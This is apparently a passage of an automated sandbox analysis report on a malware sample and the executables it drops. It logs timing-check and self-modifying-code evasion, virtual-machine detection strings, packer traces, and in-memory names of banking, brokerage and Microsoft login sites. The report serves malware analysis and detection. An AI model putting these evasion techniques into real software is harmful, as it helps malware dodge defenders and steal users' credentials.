Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED250 second address: FED26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D051A5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED6F2 second address: FED6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED892 second address: FED8A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED8A0 second address: FED8B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4D45034D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEDB3C second address: FEDB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D051A7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEDB57 second address: FEDB9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D20h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007F4D45034D29h 0x00000012 js 00007F4D45034D22h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEDCD8 second address: FEDCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D0519Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F4D44D05196h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FE2443 second address: FE247B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D1Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F4D45034D1Fh 0x00000012 jmp 00007F4D45034D21h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE321 second address: FEE326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE326 second address: FEE32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE32F second address: FEE333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE333 second address: FEE354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4D45034D22h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE354 second address: FEE35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE35A second address: FEE360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE360 second address: FEE365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE365 second address: FEE371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4D45034D16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE371 second address: FEE375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE375 second address: FEE379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE379 second address: FEE37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE891 second address: FEE8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4D45034D1Ch 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE8A3 second address: FEE8C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4D44D051A4h 0x00000010 jg 00007F4D44D05196h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEE8C8 second address: FEE8D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEEA70 second address: FEEA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4D44D05196h 0x0000000a jmp 00007F4D44D051A7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEEA93 second address: FEEAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 je 00007F4D45034D16h 0x0000000e jmp 00007F4D45034D21h 0x00000013 pop edx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEEBFF second address: FEEC12 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F4D44D05196h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEED90 second address: FEEDB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F4D45034D23h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEEDB3 second address: FEEDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FF1E87 second address: FF1E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 613B29 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 613BD3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7BDB52 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7E6D21 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 848618 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Special instruction interceptor: First address: E4EC54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Special instruction interceptor: First address: E4C552 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Special instruction interceptor: First address: E4EB6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Special instruction interceptor: First address: 108778C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 5316B8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 52F696 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 6F4EF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 6DF7E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Special instruction interceptor: First address: A3DDF1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 757A46 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Special instruction interceptor: First address: C855AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104EC54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104C552 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104EB6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 128778C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 1053B29 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 1053BD3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 11FDB52 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 1226D21 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 1288618 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 3416B8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 33F696 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 504EF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 4EF7E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 567A46 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Memory allocated: 47B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Memory allocated: 4B20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Memory allocated: 4950000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Code function: 3_2_05400229 rdtsc 3_2_05400229
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 358 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 354 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1580 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 3375 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Window / User API: threadDelayed 710
Source: C:\Users\user\Desktop\file.exe TID: 1200 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe TID: 7368 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7764 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7764 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep count: 358 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep time: -10740000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7760 Thread sleep count: 46 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7760 Thread sleep time: -92046s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep count: 340 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep time: -680340s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7836 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7740 Thread sleep count: 354 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7740 Thread sleep time: -708354s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7756 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7756 Thread sleep time: -112056s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7740 Thread sleep count: 1580 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7740 Thread sleep time: -3161580s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep count: 3375 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep time: -6753375s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 8036 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 8040 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 6176 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 2020 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 3680 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: skotes.exe, skotes.exe, 00000008.00000002.3336042883.00000000011D6000.00000040.00000001.01000000.0000000D.sdmp, 976d9f40c1.exe, 00000009.00000002.2804031030.00000000011DE000.00000040.00000001.01000000.0000000E.sdmp, 606f2f6db0.exe, 0000000A.00000002.2935241193.00000000004BB000.00000040.00000001.01000000.0000000F.sdmp, 976d9f40c1.exe, 0000000B.00000002.2924184615.00000000011DE000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 00000019.00000002.3175124734.0000013790400000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWu
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2120862136.0000000005A98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWq@
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806226818.000000000167E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806413916.00000000016E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000019.00000002.3179268401.000001379A0B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 00000019.00000002.3175124734.0000013790400000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RA
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwaren
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2120862136.0000000005A98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.0000000001294000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareQ
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: S14AV77TIR9DRWSCWIW0.exe, 00000003.00000002.2342537971.0000000000FD6000.00000040.00000001.01000000.00000006.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320028060.00000000006AB000.00000040.00000001.01000000.00000007.sdmp, QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000002.2419062316.0000000000BC7000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 00000006.00000002.2361931041.00000000011D6000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000008.00000002.3336042883.00000000011D6000.00000040.00000001.01000000.0000000D.sdmp, 976d9f40c1.exe, 00000009.00000002.2804031030.00000000011DE000.00000040.00000001.01000000.0000000E.sdmp, 606f2f6db0.exe, 0000000A.00000002.2935241193.00000000004BB000.00000040.00000001.01000000.0000000F.sdmp, 976d9f40c1.exe, 0000000B.00000002.2924184615.00000000011DE000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the 